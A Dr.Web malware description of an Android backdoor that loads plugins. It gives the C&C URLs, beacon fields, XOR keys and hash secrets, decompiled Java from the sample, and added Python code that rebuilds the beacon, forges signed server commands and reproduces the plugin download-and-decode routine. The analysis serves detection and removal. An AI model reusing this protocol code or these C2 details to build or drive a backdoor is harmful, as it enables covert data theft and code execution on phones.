Android.Backdoor.854.origin

Added to the Dr.Web virus database: 2022-07-22

Virus description added:

  • SHA1: c747a3a901f3076c504dc513bfcf64e8d29600ac (PrivteProvide.jar)

Description

Android.Backdoor.854.origin is a trojan application for Android devices. It is a .DEX file packed into a .JAR archive, which other trojans, notably Android.BackDoor.3104, copy into the directories of targeted apps. Its main function is to download and launch additional malicious modules (plugins) in the context of those targeted apps.

Operating routine

The trojan is started through the com.androidx.v13.PrivteProvide.getInstance(String) entry point. Once launched, it polls at short intervals for an instance of the android.app.Application class until it obtains one.

Android.Backdoor.854.origin creates the following subdirectories in the directories containing the files of the targeted apps:

  • .cache/pt—XOR-encoded plugin files are downloaded into this directory;
  • .cache/pn—decoded plugins are saved into this directory;
  • .cache/pd—optimized versions of the plugins are saved in this directory; the operating system creates them when the originals are loaded through the DexClassLoader class.

Next, the trojan launches the downloaded plugins from the pn directory. The plugins are received upon connecting to one of the C&C servers.

The connection with the C&C server

Android.Backdoor.854.origin sends requests to the assigned C&C servers in list order, starting with the first one. If it cannot establish a connection with the current server within 24 hours, it proceeds to the next one. The time of the last successful connection is stored in the successTime variable of the sp_brois_settings configuration file.

The list of C&C server URLs is as follows:

  • hxxp[:]//api[.]genetence[.]com:8300/pl2
  • hxxp[:]//api[.]matriature[.]com:8300/pl2
  • hxxp[:]//api[.]miretic[.]com:8300/pl2
  • hxxp[:]//api[.]sensfaction[.]com:8300/pl2
  • hxxp[:]//45[.]33[.]61[.]62:8300/pl2

The first request is sent 2 minutes after the thread starts, and requests are then repeated in an infinite loop at 60-minute intervals. The first URL in the list is used initially; if no connection succeeds within 24 hours, the trojan switches to the next URL.

The following parameters are used in the request:

Request parameter   Description
a_l                 Android SDK version (API level)
a_i                 android_id, the unique device ID
a_v                 Version name of the application the trojan runs in
a_c                 Version code of the application the trojan runs in
model               Device model
brand               Device brand
ver                 The string "v3"
pack                Package name of the application the trojan runs in
imsi                IMSI
imei                IMEI
res                 Screen resolution
sys                 1 if the targeted application is a system app, otherwise 0
fr                  A string sent when the trojan starts
ctm                 Current time
pft                 Time elapsed since the trojan module started
sn                  MD5 hash of the concatenation a_l + a_i + a_v + a_c + "oignuowwg" + ctm

The data sent to and received from the C&C server is XOR-encoded. The constant in the sample is 0x24D3, but the cast to byte discards the high byte, so every byte is effectively XORed with the single key byte 0xD3:


// XOR with 0x24D3; after the (byte) cast only the low byte 0xD3 takes effect,
// so the same routine both encodes outgoing and decodes incoming data.
public static byte[] xor(byte[] data) {
    int i;
    for(i = 0; i < data.length; ++i) {
       data[i] = (byte)(data[i] ^ 0x24D3);
    }
    return data;
}
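The beacon construction and its inverse, as an added example that is not part of the Dr.Web description: it builds the parameter set from the table above, computes sn with the salt the sample uses, applies the transport XOR (the Java cast reduces 0x24D3 to the single key byte 0xD3), and then decodes and validates a captured beacon the way an analyst would when checking intercepted traffic. The field names, the sn recipe and the XOR constant come from the description; the form-encoded wire layout, the device values and the fr value are assumptions made for this example.

```python
import hashlib
from urllib.parse import urlencode, parse_qs

# The sample XORs each byte with 0x24D3 and casts to byte, so only the low
# byte of the constant survives: the effective transport key is 0xD3.
XOR_KEY_TRANSPORT = 0x24D3 & 0xFF
SN_SALT = "oignuowwg"  # salt concatenated into the sn hash by the sample

# Constructed device profile for the example (not real identifiers). "fr" is
# only described as "a string sent when the trojan starts", so its value here
# is a placeholder.
DEVICE = {
    "a_l": 29, "a_i": "9774d56d682e549c", "a_v": "1.0.3", "a_c": 103,
    "model": "Pixel 3a", "brand": "google", "ver": "v3",
    "pack": "com.example.target", "imsi": "310260000000000",
    "imei": "490154203237518", "res": "1080x2220", "sys": 0, "fr": "boot",
}


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def compute_sn(a_l, a_i, a_v, a_c, ctm) -> str:
    """sn = MD5(a_l + a_i + a_v + a_c + "oignuowwg" + ctm), all as strings."""
    material = f"{a_l}{a_i}{a_v}{a_c}{SN_SALT}{ctm}"
    return hashlib.md5(material.encode()).hexdigest()


def build_beacon(device: dict, ctm: int, pft: int) -> bytes:
    """Form-encode the parameters (layout assumed) and apply the transport XOR."""
    params = dict(device)
    params["ctm"] = ctm
    params["pft"] = pft
    params["sn"] = compute_sn(device["a_l"], device["a_i"], device["a_v"],
                              device["a_c"], ctm)
    return xor_bytes(urlencode(params).encode(), XOR_KEY_TRANSPORT)


def decode_beacon(blob: bytes) -> dict:
    """Analyst side: strip the XOR and split the form-encoded fields."""
    plain = xor_bytes(blob, XOR_KEY_TRANSPORT).decode()
    return {k: v[0] for k, v in parse_qs(plain).items()}


def sn_valid(fields: dict) -> bool:
    """Recompute sn from the decoded fields; a mismatch means the capture was
    altered or the salt/recipe differs from this sample."""
    expected = compute_sn(fields["a_l"], fields["a_i"], fields["a_v"],
                          fields["a_c"], fields["ctm"])
    return fields.get("sn") == expected


if __name__ == "__main__":
    blob = build_beacon(DEVICE, ctm=1658500000000, pft=120000)
    fields = decode_beacon(blob)
    print(fields["pack"], fields["sn"], sn_valid(fields))
```

Because the key is a single byte, a captured beacon can be recognised without the key: XORing the body with 0xD3 should yield printable ASCII containing the field names above, and a recomputed sn that matches the transmitted one confirms the capture is intact.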

If the server returns status code 200, the response body must be JSON, and its s field must equal the MD5 of the u field concatenated with the string "&zhanghui18888"; only then does the trojan execute the command to download and launch plugins:


JSONObject json = new JSONObject(response_body);
String s = json.getString("s");
// The server proves knowledge of the shared suffix: s must equal MD5(u + "&zhanghui18888").
if(Hash.md5(json.getString("u") + "&zhanghui18888").equals(s)) {
    .... //do work: process the plugin list
}

The JSON returned by the C&C server contains a plugin array; each entry carries the plugin_file, plugin_url and plugin_size fields.

After parsing the command, the trojan deletes from the /.cache/pn directory any previously stored plugin that the command does not list. Plugins that the command lists but that are not yet present on the device are downloaded into the /.cache/pt directory. The downloaded plugin files are XOR-encoded with the single key byte 0xB9:


// Plugin files on disk are XORed with the single key byte 0xB9; the same
// routine both encodes and decodes, writing the result to a new buffer.
private static byte[] xor(byte[] data) {
    byte[] out = new byte[data.length];
    int i;
    for(i = 0; i < data.length; ++i) {
        out[i] = (byte)(data[i] ^ 0xB9);
    }
    return out;
}

The trojan decodes them and places the result into the /.cache/pn directory.
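The response handling, as an added example that is not part of the Dr.Web description: it verifies the s hash against u and the "&zhanghui18888" suffix, removes plugins from .cache/pn that the command no longer lists, stores newly listed ones encoded in .cache/pt and decoded with the 0xB9 key in .cache/pn, and refuses to touch the disk when the hash check fails. The secret suffix, the XOR key, the directory names and the plugin_file/plugin_url/plugin_size fields come from the description; the JSON key "plugin" for the array, the meaning of u, the download callback and the size check are assumptions of this example, and the fetch is a dictionary lookup over constructed data rather than a network request.

```python
import hashlib
import json
import tempfile
from pathlib import Path

PLUGIN_XOR_KEY = 0xB9               # key used by the sample's plugin decoder
RESPONSE_SECRET = "&zhanghui18888"  # suffix the sample hashes together with "u"
PLUGIN_ARRAY_KEY = "plugin"         # assumed name of the JSON array of plugins


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def parse_command(body: str):
    """Return the command dict if s == MD5(u + secret), else None."""
    cmd = json.loads(body)
    expected = hashlib.md5((cmd["u"] + RESPONSE_SECRET).encode()).hexdigest()
    return cmd if cmd.get("s") == expected else None


def sync_plugins(app_dir: Path, body: str, fetch):
    """Mirror the plugin set named in the command into .cache/pn.

    fetch(url) -> bytes stands in for the HTTP download (assumption). Returns
    None when the response fails the hash check; nothing on disk changes then.
    """
    cmd = parse_command(body)
    if cmd is None:
        return None
    pt = app_dir / ".cache" / "pt"   # encoded downloads
    pn = app_dir / ".cache" / "pn"   # decoded plugins, loaded from here
    pt.mkdir(parents=True, exist_ok=True)
    pn.mkdir(parents=True, exist_ok=True)

    wanted = {p["plugin_file"]: p for p in cmd[PLUGIN_ARRAY_KEY]}

    # 1. Drop plugins the command no longer lists.
    deleted = []
    for f in pn.iterdir():
        if f.name not in wanted:
            f.unlink()
            deleted.append(f.name)

    # 2. Download plugins that are listed but not yet present, then decode.
    downloaded = []
    for name, p in wanted.items():
        if (pn / name).exists():
            continue
        enc = fetch(p["plugin_url"])
        if len(enc) != p["plugin_size"]:
            continue  # size check added by this example, not taken from the sample
        (pt / name).write_bytes(enc)
        (pn / name).write_bytes(xor_bytes(enc, PLUGIN_XOR_KEY))
        downloaded.append(name)

    return {"deleted": sorted(deleted), "downloaded": sorted(downloaded),
            "loaded": sorted(f.name for f in pn.iterdir())}


def make_response(u: str, plugins: list, secret: str = RESPONSE_SECRET) -> str:
    """Server side of the exchange, constructed for the example."""
    s = hashlib.md5((u + secret).encode()).hexdigest()
    return json.dumps({"u": u, "s": s, PLUGIN_ARRAY_KEY: plugins})


def demo():
    """Run a valid command and a forged one against a temporary app directory."""
    plugin_body = b"dex\n035\x00constructed plugin body"   # constructed payload
    url = "http://c2.example.invalid/pl/p1.jar"             # constructed URL
    store = {url: xor_bytes(plugin_body, PLUGIN_XOR_KEY)}   # "server" storage
    fetch = lambda u: store[u]
    with tempfile.TemporaryDirectory() as tmp:
        app_dir = Path(tmp)
        pn = app_dir / ".cache" / "pn"
        pn.mkdir(parents=True)
        (pn / "old.jar").write_bytes(b"stale plugin")       # not in the new command
        good = sync_plugins(app_dir, make_response("u-123", [
            {"plugin_file": "p1.jar", "plugin_url": url,
             "plugin_size": len(plugin_body)}]), fetch)
        decoded_ok = (pn / "p1.jar").read_bytes() == plugin_body
        forged = sync_plugins(app_dir,
                              make_response("u-123", [], secret="wrong"), fetch)
        untouched = (pn / "p1.jar").exists()
    return good, decoded_ok, forged, untouched


if __name__ == "__main__":
    print(demo())
```

The hash check is the only thing standing between a man-in-the-middle and code execution inside the targeted app: anyone who knows the suffix can forge a command, so the decoded plugin bodies in .cache/pn, not the transport, are what to collect during triage.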

After that, all plugins present in the /.cache/pn directory are loaded into memory and run in the context of the attacked application. Depending on their functionality, such plugins can perform various malicious actions.

If the C&C server returns status code 206, Android.Backdoor.854.origin writes the variables "successFlag" = 1 and "successTime" = System.currentTimeMillis() to the sp_brois_settings configuration file, recording that the request to the C&C server succeeded. It does the same when it receives code 200. On code 206, however, the trojan does not download any plugins.

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow the recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a ransom, or some other announcement prevents you from using the device normally), do the following:
    • Boot your smartphone or tablet into safe mode (depending on the operating system version and the particular device, this is done in different ways; consult the user guide shipped with the device or contact its manufacturer);
    • Once safe mode is active, install Dr.Web for Android Light on the infected device and run a full system scan; follow the steps recommended for neutralizing the detected threats;
    • Switch off the device and turn it on again normally.

© Doctor Web
2003 — 2022